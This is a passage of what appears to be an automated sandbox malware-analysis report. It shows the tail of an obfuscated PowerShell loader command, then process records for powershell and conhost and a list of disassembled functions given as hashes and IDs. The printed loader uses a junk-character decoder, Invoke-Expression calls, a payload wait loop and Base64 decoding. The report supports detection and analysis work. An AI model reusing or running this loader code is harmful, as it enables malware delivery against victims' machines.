MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
                  Imagebase:0x7ff741d30000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:12
                  Start time:07:10:03
                  Start date:14/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FFAAC6619EF Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2596266902.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac660000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8h
                    • API String ID: 0-2550175997
                    • Opcode ID: a3a3dfbc228b7937b3117f07fea49bd18ba11891614a79e23976057bc626ea3e
                    • Instruction ID: cc320695490ac463bb62252f8f8431b44aeb9f42db51c2c2274551a99c3e3e98
                    • Opcode Fuzzy Hash: a3a3dfbc228b7937b3117f07fea49bd18ba11891614a79e23976057bc626ea3e
                    • Instruction Fuzzy Hash: 5A21B293E0FAC29FF39AD7681856178AEC1DF56654B0864FAD08DCB1D3D8189C0983D2
                    Function 00007FFAAC6648F9 Relevance: .5, Instructions: 515COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2596266902.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac660000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fb695d7f38ba4bdd43de9a612c7df0c20239893f29126be9a4e8e656332c7ac
                    • Instruction ID: 61ede5640f3254f067780b1cf362da1da746f6a7cd10eb66b1fe2f9606942fbc
                    • Opcode Fuzzy Hash: 4fb695d7f38ba4bdd43de9a612c7df0c20239893f29126be9a4e8e656332c7ac
                    • Instruction Fuzzy Hash: 5CE1E56290EBC69FF35BD72888556B5BFD1DF53210B08A1FAE04DC71D3ED19A8098392
                    Function 00007FFAAC667395 Relevance: .4, Instructions: 438COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2596266902.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac660000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cd66380f6ef44507652865837f9897539bc1be99647a2effcd32649c96c150e0
                    • Instruction ID: 504dbf1091b25c42d978ce92ec7299163e0b1b5832c06ffee222a4e9851e0b45
                    • Opcode Fuzzy Hash: cd66380f6ef44507652865837f9897539bc1be99647a2effcd32649c96c150e0
                    • Instruction Fuzzy Hash: 1FD14561A1EA8ACFF75AEB2888155F5BF92EF42314F1861FAD44DC7093DE18D80883D1
                    Function 00007FFAAC594258 Relevance: .2, Instructions: 248COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2595987285.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac590000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a3f9449caacfa51b2623ca61a1b75fe47e8625f37c4dd203ed915712027287f
                    • Instruction ID: bc7994954ae65fa55055e1c2786d9d2153e860da03c9b99fbf9871b7cbc96c45
                    • Opcode Fuzzy Hash: 0a3f9449caacfa51b2623ca61a1b75fe47e8625f37c4dd203ed915712027287f
                    • Instruction Fuzzy Hash: E161283150D7868FE749DB28D8919A17BE0EF9732071845FED089CB1A3DA1AEC4AC7D1
                    Function 00007FFAAC664A84 Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2596266902.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac660000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ce177c36db3e192e0ed836bd409267a4faa234ec09ada3f4c9a1323b32245876
                    • Instruction ID: 196bace33ae2011153242d3528d13632aae9ed21537023950c3b47f74d53e6cd
                    • Opcode Fuzzy Hash: ce177c36db3e192e0ed836bd409267a4faa234ec09ada3f4c9a1323b32245876
                    • Instruction Fuzzy Hash: 39213B22E0FB869BF3AED7284851175E6C2DF42210B58B5B9E04DC31D7FD19EC0942C5
                    Function 00007FFAAC5941E5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2595987285.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ffaac590000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                    • Instruction ID: 6567c2eff7ad672f2767be348408f0e1b05ae151496d3f9768de29a71c5a17d3
                    • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                    • Instruction Fuzzy Hash: 9001A77010CB0C8FD744EF0CE051AA6B3E0FB95320F10056DE58AC3661DB36E882CB41